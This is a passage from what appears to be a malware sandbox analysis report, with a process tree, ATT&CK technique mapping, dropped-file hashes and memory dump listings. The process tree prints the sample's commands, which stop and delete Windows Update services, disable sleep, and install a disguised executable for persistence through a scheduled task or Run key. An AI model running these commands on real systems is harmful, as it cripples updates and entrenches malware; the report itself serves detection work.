PID:1320

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5068

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1180

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:2328

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1380

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4420

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5032

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4560

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1944

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:3280

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:3544

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:4088

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2952

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:408

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:1516

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:2720

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vngabyebz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'nvdrivesllapi' /tr '''C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'nvdrivesllapi' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "nvdrivesllapi" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe' }
2⤵
PID:4220

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3392

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3392 -s 1012
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3624

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3500

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3500 -s 396
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3240

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4856

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:1588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:4200

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2696

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2684

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4480

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 460 -p 3500 -ip 3500
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1204

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 468 -p 3392 -ip 3392
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4220

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 608 -p 4340 -ip 4340
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5028

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 240 -p 3228 -ip 3228
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:320

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 648 -p 316 -ip 316
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2740

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 632 -p 2500 -ip 2500
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3112

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4340

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4340 -s 452
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2728

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3228 -s 480
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:932

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:316

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 316 -s 372
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4756

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2500

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2500 -s 776
2⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2648

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA803.tmp.csv
Filesize
40KB

MD5
df5d887db2c9873280859121715b2718

SHA1
5bda88bdda76a5a7e8c66b47ab5f3b7f1b4fd636

SHA256
d1df678bf5883eed0a0f0a8f94620cd3bd43152556269533ab3aebc38d655bc1

SHA512
659c0357085d52961b096dec4c581fd313cfa55a67c5ccaae92785e147dd72c7785e1f033335102a891804fb6362ef4c893961c9f7ff0936b228bbe13d08aeba

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA842.tmp.txt
Filesize
13KB

MD5
5c148dd9f9074ec7528a3498aa16ea4c

SHA1
b631019fdd860baeab070ea34a06650b2b27bd41

SHA256
c600bd19e3a116f92861f05c426ce4349e11ca9bb64c686dce4d9b5424c79d96

SHA512
4dbd4b3a8d514c9b2c2b9338b29a8a0da7b5e88c2008523cee9f07ab9ce25a47284403b12cc62330b44186e89c80c3de260d9fe413c61df7ab0a9f39ced2ccc0

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA28.tmp.csv
Filesize
38KB

MD5
0569e0c78e6b873136f45fd6f19053af

SHA1
bdb70822412c6e8e8222daa9ecac7caa65736799

SHA256
9e6b626b0a10f27269fb62c139fb7c4e97efaf92ff668d9598b5014ff972fb84

SHA512
a8610c52ef0756dfc75b08765f5e75604d5386755f24890d79b7cb7f94e2b0e9f41524c71cf9c32c7bfee2baaf274e437fbbdf0584db480e1f2050d63f22ddd3

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA67.tmp.txt
Filesize
13KB

MD5
1f1e5a1279c341bb4bc54fd980523fc7

SHA1
5ba75fc4541c753ce5331941b4c539aa95dd979a

SHA256
b35ebcd45e0a7ec9779f9adaf95246e88f06baf6cbfbfcff175f3078302bc4b2

SHA512
13953cc040614adeb560cf52895d927c9d319ac8785c8f82e716e5eae808d58d9f51b3b243e1076b3bbcac03b5455f24a9833daea9e3ec6bdc4c6340131761b0

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC255.tmp.csv
Filesize
37KB

MD5
eb44d400951cbb64c7bcd006934f13e8

SHA1
8c579bcc5d9270d4428217537da4fbc85b37d572

SHA256
1921af68e34bd760b7a4be87c2c5e95f6a2a5588df31cfb6a26bb4be83500c68

SHA512
809feef5ebd723cb48f343c7d9054be965bc9647614f34614fce1ca4afad9119a28225cea9f5d290f88e6939b5c91284b014d26154e2fd831befc888866cf7dc

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC295.tmp.txt
Filesize
13KB

MD5
4ff7c10600650bee7b737aeadc63b295

SHA1
1f836b0d0789f0ed5653cb3300b1726928b09a10

SHA256
004ae0f67fb4f1fd891e2ea042f5e85ba5b276cd4a044f2bfecee19485d252ac

SHA512
329f56894c380696a6812d14a733b2e5162755e57a203009fb66e55201cdb8d1c1539f5cd1584d7c96db19f4a092b9f4f409db58ab0e7d794ea909987cfca018

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC6CC.tmp.csv
Filesize
37KB

MD5
04d8e980ba0c48c40b10b2ebe8ec6233

SHA1
29b91422805d444efc5f31aedcce02df7d11ee9d

SHA256
77fa9ecfd2e42002a5099562f1fe738891db514084cfbe3a8f22f1bb3acd5bc3

SHA512
c65be040525ef30cf6dda020ecdf6565220214e5915e7f1d1ded13f4d2dfae063f5bb37b300ac5bac6137d0f8829af4a685adb94ad63746ff77da1a8cd381e85

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC71B.tmp.txt
Filesize
13KB

MD5
9abcdece1c12177a120a416dfba1e4a8

SHA1
f8bbc443aa7becc10600d3dd38b1841964a7b309

SHA256
ea20bc95804500ae00b4f3d85146005531f77b71968c73114d2fe53ad76906b2

SHA512
354546b31f3c6f19df58089fdbefc4f57e20d631c46c4eabd1f4617b67bdd408edc57057e6194d705e7c1622fb978fdea8378fff572b18cf8706a23407069032

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB81.tmp.csv
Filesize
37KB

MD5
f1aefb22808f950f04d39e68f4584af6

SHA1
b798e04f5b5e2580c03851234c7c169b90a4831c

SHA256
77da8a0bdb8fff573fab85a3dcce6cb01ad71abca5c5efac616983a4ea3570d3

SHA512
d3d90355035aabd42527e18e3620d27d1d4a1f2ba13f4883a14bd3cc5366996eb306bbf521a37fa8b9ce57c809a03f30164b02e09960046d9754bd86107d37d7

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBC0.tmp.txt
Filesize
13KB

MD5
fa3fd03a4c0e368092b57f7b3aaad665

SHA1
e73d728c9b88b23b940cfcede0e0a332ecd0136d

SHA256
e96caaccd54b446e81e00d904e8591e72a5f4a605ee352abcb1c3b2337ac3239

SHA512
7f594f7dd87fcd8b631f42d214192f3769eb055fbdd12189520342ae36bd84189462410d94702c380f013f6ab5cae46c32f7b61d126926613afe0b853a51abe0

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD19D.tmp.csv
Filesize
37KB

MD5
c94de34fb2484a97a54cba5c786e37cc

SHA1
8985580eb576ff86b892df7929334a5a20ee7c39

SHA256
e5997ecfd186e53a12c730ae1874309b15a42e397eff4a11f25334c1a59a5172

SHA512
75822c814a85a7143ab05951f1cb220f0c8c8fdd44cda04505c49d1fc4512385eb9f790a724b18fd19043a5d873535c51b5c3ad23b91160a60986805f23dfc4c

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD1DD.tmp.txt
Filesize
13KB

MD5
f7006ac3d2697050ad023e12dda9eb99

SHA1
be1276bf9d08f656cc8a22efbe42e1b3aa2d8d9e

SHA256
66ccdac126405912d3a86587572eeed9d7a306210685ce37808680e234e4e0a5

SHA512
e35351836103e1ba8a2e852685031ca59de53fc314d97460b543212426c423d60a096f282db754acf2c34400e9518d30fc706b5336c8e1b50bdc0ac43c2383aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
00e7da020005370a518c26d5deb40691

SHA1
389b34fdb01997f1de74a5a2be0ff656280c0432

SHA256
a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

SHA512
9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6539a34c74920a5c656922258c336b5f

SHA1
36a74be3126b4aa0deef6e094d6199b8f5056645

SHA256
5427dfb4d22bef830b6f6b395b51489a791db48865572adfcb2f8c752293aae7

SHA512
bceb8b61e27e0b710d144005ea93419a8299c70d87188cd8a40253fac32f0a297008f333a1576fa357c5442a395429865a327db8471e048c19f0a0de3b712615

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
Filesize
8KB

MD5
67af0a37945bc5905bf1d1ca1d717779

SHA1
3d866a11f83fc38b6971048182a69a3652d845d2

SHA256
0b8539ca9ec3bf830911323524e25ceddfe793853ff6f34a68b5c0cc945c01ad

SHA512
0ffa215ea2d518601fd4a6dfa52c9d1b5798729ae3e4b19796f9c67378ce903703c0e9551929c4151b1a24d31823581dc711d1d45500a64bab513095d93a5195

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chk
Filesize
8KB

MD5
183a1b580c5e888442745e8ad482054d

SHA1
483c932b372e382b02ffa3036ace1a4af75d0e23

SHA256
941038c46308610f7b94264ebab01192e69d4d38e178a7c959f87cd6376542e7

SHA512
cd0750e0a3f7fe4a9d776767e75a36089f80fc9ee270efda88064ca0ce642dde3380e9c0d3d08a03239d48449d49721280d64089e0e37732408d7ba354c8580e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
Filesize
512KB

MD5
1a43aaea45acd5452a94553d8eacf570

SHA1
4268ab7ef3ae43857f1ddcb247e5ebed75ba49f2

SHA256
962076bc699e5f2ec5bb7a6051cc3955fdfaab4b25751ffbf60b49eb3e3a1c23

SHA512
daae7530211ff3742f2889c6b2be3b25410ec5879a90b2a5050f69fb281f8cc59b60f677cdcc25189db866c6101c12c8bb75f065dc7bc2f27684fc180d6b6288

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
Filesize
512KB

MD5
8acd368ccb93768bcfe6c02e670ef947

SHA1
450f843f6be09e2bdff6c61134f34355bda1fed2

SHA256
0cdb6c83bfcbe7782786ae0e013398e9048781dd4ef76fbb7118e24d40b8efa8

SHA512
41ae1d9c48fa77734b757a4a7fcdde8b83f0d932861898bb3869816d4156cb140e6561a033703d8aa1c6ff95f03ba1d53d48d062b2f728f687701e1fe1e7204b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.log
Filesize
512KB

MD5
821b2fc0c00cc068c376c0370994f6e8

SHA1
75df8e05ca425ce3885fd659187f93a73da35491

SHA256
a584656f0c78bcfe5a0a9d5304a182471ca39441a22f538a2f22dd7a3ce4d670

SHA512
1e29c54b3716dd4761889721f2d282677c1f581d1ad02c13d6980b734ccc494252cf921ca473ef47c6fc314788d132fb026f6b6b2727ecb652ac3954510586f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
Filesize
14.0MB

MD5
500eafa1b0eb086b10cd2a74b070f48e

SHA1
a578c293110dd3596675c9228c08f1a58da79a7f

SHA256
9944f8f711beff1393414869f814bcc80605105abf23944b0c688f88eb1dca51

SHA512
5cc981edfb398cfe7dabcf68307f7df7f0419613f4efbf03ff5efdf0c82240a54797f4f8fa84634cd4a5959ca58f7655bd83d300182d9c66c5238c66946ead46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
Filesize
14.0MB

MD5
854ac1c6c5ee58b088f85a062b5aaa0d

SHA1
0d4146ed0ce7f6b5af989040f64d7809c41f4b23

SHA256
1486b80d5e53821e25da59204bb376f1cdc6cadd83ac482e4def67c024de9544

SHA512
d487a0b0b29fd9159cd6f3cfa6d442c1fd31039e2aec9caf8413d8aa861cceb302a73e03fab53bc26dc9007222bb930a2e9413ded94fe32db5c2aae95252c52b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
Filesize
14.0MB

MD5
a10962eb44f77c1c759a1e195b977c0a

SHA1
98b54f4ca341615f46ec874326e92f5187564b86

SHA256
e16d94a506b0c25ef7566241ad6b17d5b646a73404f232027c49ea6ce475ed3e

SHA512
301830530a9dc7d48cd32e3450a98d9e0dde99c2ff2a0d52d8eb20f509bebe5b7a928e71e1c8e22b3966eeba12718dec5cf23f28bd0060e200a80d4c904e1cd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm
Filesize
16KB

MD5
8e4a9b1ed700c3b9aee9bde5444fbde6

SHA1
209e67b54338e4f3dfda416857605f7e491be23d

SHA256
6c02bfbe6db3b5dacb59542d4b79d90402eaf4655780cb13799d5fc3756e9339

SHA512
09bcc5a8ffd456d5c0beebfe8acc799ca806a1c9b89a7522d250d3171ec1003f0014afa2ca1761523f48199849d0121348a67d821bfb4b708bc7da66189de503

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm
Filesize
16KB

MD5
23ef4e9f40b8482a7a63430da97675c6

SHA1
8f2595e52b0b28b7241b9a7ebca7e30eedc42a72

SHA256
19a9b6af773c56023dbf92182ad4a6fb85b0b97905f0613685721d066b55cbcd

SHA512
db7b8610d2e134416b8fdc0fcaab873ad15aa6e22b5e4f59510ebb8610670233c01f6bf39b24d2095ac947e55b8217f369aeea1902cc575c421b342ce101d5f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm
Filesize
16KB

MD5
f24ee29554d6493d58bab2a01193624a

SHA1
2c17910bac831ab298c361a3e092c44824036b73

SHA256
ba05efd7cf1ba4142e91a510bb7b7501e6b4664d5b7d74aa0642752540b15678

SHA512
3afd412bbf14dfc8def1027290a37bce79d86de404aa720a20d487ec89930555ca5e36dff28ce2f8190d62d4435ee4cbc98574b977c037999320543cc0bfcf5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\72EE.exe
Filesize
9.9MB

MD5
05c68d46614a70c76594c16511cda2f3

SHA1
01c334ad688dd60b4c97a5bc0ceefb1ac7b1e37c

SHA256
d2783510900becacd197690ce6efba338adc555d1a473a004951ae7ca0524778

SHA512
e324fbd8c63a232d26e5b58fcaf82ab2bd3b6f0f228ad89bd99eb5cb8c14eafbe4f933d4afa57aab07e20121e80442d74eb44cd315bda7816642d290f104bd7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\72EE.exe
Filesize
9.9MB

MD5
05c68d46614a70c76594c16511cda2f3

SHA1
01c334ad688dd60b4c97a5bc0ceefb1ac7b1e37c

SHA256
d2783510900becacd197690ce6efba338adc555d1a473a004951ae7ca0524778

SHA512
e324fbd8c63a232d26e5b58fcaf82ab2bd3b6f0f228ad89bd99eb5cb8c14eafbe4f933d4afa57aab07e20121e80442d74eb44cd315bda7816642d290f104bd7a

Download Submit
C:\Users\Admin\AppData\Local\Temp\73F8.exe
Filesize
1.1MB

MD5
e1bd3376054e33ccab1edb8863078d2c

SHA1
817afcbe29a64e77a983512d35b331888deb1d45

SHA256
bdd1115f42955f6f92c520e8814eb7462ae22b00fea1c1f51b3f27149cdf5c60

SHA512
e8765f67ef10522bddbb1d877add83b25ce48b809fc68927936765751f4b10c0b06e4abc11900ee782ab2a28e93fbeafa07952a21c90c79543b953cf9f21ed6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\73F8.exe
Filesize
1.1MB

MD5
e1bd3376054e33ccab1edb8863078d2c

SHA1
817afcbe29a64e77a983512d35b331888deb1d45

SHA256
bdd1115f42955f6f92c520e8814eb7462ae22b00fea1c1f51b3f27149cdf5c60

SHA512
e8765f67ef10522bddbb1d877add83b25ce48b809fc68927936765751f4b10c0b06e4abc11900ee782ab2a28e93fbeafa07952a21c90c79543b953cf9f21ed6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\8416.exe
Filesize
9.0MB

MD5
2d778adbb5080751e8b1e72bddd48858

SHA1
b543f7db5579ce121dcefe4c85138b54c29be10a

SHA256
a818ded5618645c9698511722fa11048f87a6367994feb532da917c305306d29

SHA512
8c2c2275099ac02e9fab044192855635385fe3426127e7ed41d4945bda7890b29828e4e7228d977e3ef8f0616fc88642875a699e61d84f5a19bd3930a73fe3a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\8416.exe
Filesize
9.0MB

MD5
2d778adbb5080751e8b1e72bddd48858

SHA1
b543f7db5579ce121dcefe4c85138b54c29be10a

SHA256
a818ded5618645c9698511722fa11048f87a6367994feb532da917c305306d29

SHA512
8c2c2275099ac02e9fab044192855635385fe3426127e7ed41d4945bda7890b29828e4e7228d977e3ef8f0616fc88642875a699e61d84f5a19bd3930a73fe3a9

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe
Filesize
9.9MB

MD5
05c68d46614a70c76594c16511cda2f3

SHA1
01c334ad688dd60b4c97a5bc0ceefb1ac7b1e37c

SHA256
d2783510900becacd197690ce6efba338adc555d1a473a004951ae7ca0524778

SHA512
e324fbd8c63a232d26e5b58fcaf82ab2bd3b6f0f228ad89bd99eb5cb8c14eafbe4f933d4afa57aab07e20121e80442d74eb44cd315bda7816642d290f104bd7a

Download Submit
C:\Users\Admin\AppData\Roaming\WindowsMIT\nvdrivesllapi.exe
Filesize
9.9MB

MD5
05c68d46614a70c76594c16511cda2f3

SHA1
01c334ad688dd60b4c97a5bc0ceefb1ac7b1e37c

SHA256
d2783510900becacd197690ce6efba338adc555d1a473a004951ae7ca0524778

SHA512
e324fbd8c63a232d26e5b58fcaf82ab2bd3b6f0f228ad89bd99eb5cb8c14eafbe4f933d4afa57aab07e20121e80442d74eb44cd315bda7816642d290f104bd7a

Download Submit
C:\Users\Admin\AppData\Roaming\gkIWDAuNSZ\svcupdater.exe
Filesize
1.1MB

MD5
e1bd3376054e33ccab1edb8863078d2c

SHA1
817afcbe29a64e77a983512d35b331888deb1d45

SHA256
bdd1115f42955f6f92c520e8814eb7462ae22b00fea1c1f51b3f27149cdf5c60

SHA512
e8765f67ef10522bddbb1d877add83b25ce48b809fc68927936765751f4b10c0b06e4abc11900ee782ab2a28e93fbeafa07952a21c90c79543b953cf9f21ed6f

Download Submit
\??\c:\users\admin\appdata\roaming\gkiwdaunsz\svcupdater.exe
Filesize
1.1MB

MD5
e1bd3376054e33ccab1edb8863078d2c

SHA1
817afcbe29a64e77a983512d35b331888deb1d45

SHA256
bdd1115f42955f6f92c520e8814eb7462ae22b00fea1c1f51b3f27149cdf5c60

SHA512
e8765f67ef10522bddbb1d877add83b25ce48b809fc68927936765751f4b10c0b06e4abc11900ee782ab2a28e93fbeafa07952a21c90c79543b953cf9f21ed6f

Download Submit
memory/264-273-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/320-418-0x0000000000000000-mapping.dmp

Download
memory/336-253-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/336-314-0x000002AF342F0000-0x000002AF34317000-memory.dmp

Filesize
156KB

Download
memory/408-475-0x0000000000000000-mapping.dmp

Download
memory/516-260-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/568-215-0x0000000000000000-mapping.dmp

Download
memory/604-312-0x00000196823D0000-0x00000196823F1000-memory.dmp

Filesize
132KB

Download
memory/604-313-0x0000019682400000-0x0000019682427000-memory.dmp

Filesize
156KB

Download
memory/604-252-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/676-315-0x0000015E6F200000-0x0000015E6F227000-memory.dmp

Filesize
156KB

Download
memory/676-261-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/716-180-0x0000000000400000-0x00000000018A9000-memory.dmp

Filesize
20.7MB

Download
memory/716-161-0x0000000000400000-0x00000000018A9000-memory.dmp

Filesize
20.7MB

Download
memory/716-155-0x0000000000000000-mapping.dmp

Download
memory/788-235-0x0000000140000000-0x0000000141190000-memory.dmp

Filesize
17.6MB

Download
memory/900-258-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/932-427-0x0000000000000000-mapping.dmp

Download
memory/940-216-0x0000000000000000-mapping.dmp

Download
memory/960-316-0x0000024B9DDA0000-0x0000024B9DDC7000-memory.dmp

Filesize
156KB

Download
memory/960-263-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1044-259-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1060-257-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1124-186-0x0000000000CF0000-0x0000000000CF7000-memory.dmp

Filesize
28KB

Download
memory/1124-166-0x0000000000CE0000-0x0000000000CEB000-memory.dmp

Filesize
44KB

Download
memory/1124-165-0x0000000000CF0000-0x0000000000CF7000-memory.dmp

Filesize
28KB

Download
memory/1124-159-0x0000000000000000-mapping.dmp

Download
memory/1128-243-0x0000000140002314-mapping.dmp

Download
memory/1128-250-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1128-251-0x00007FF89CA50000-0x00007FF89CC45000-memory.dmp

Filesize
2.0MB

Download
memory/1128-242-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1128-245-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1128-246-0x00007FF89CA50000-0x00007FF89CC45000-memory.dmp

Filesize
2.0MB

Download
memory/1128-247-0x00007FF89C070000-0x00007FF89C12E000-memory.dmp

Filesize
760KB

Download
memory/1152-319-0x000002246AD60000-0x000002246AD87000-memory.dmp

Filesize
156KB

Download
memory/1152-256-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

Filesize
64KB

Download
memory/1160-162-0x0000000000910000-0x0000000000919000-memory.dmp

Filesize
36KB

Download
memory/1160-160-0x0000000000920000-0x0000000000924000-memory.dmp

Filesize
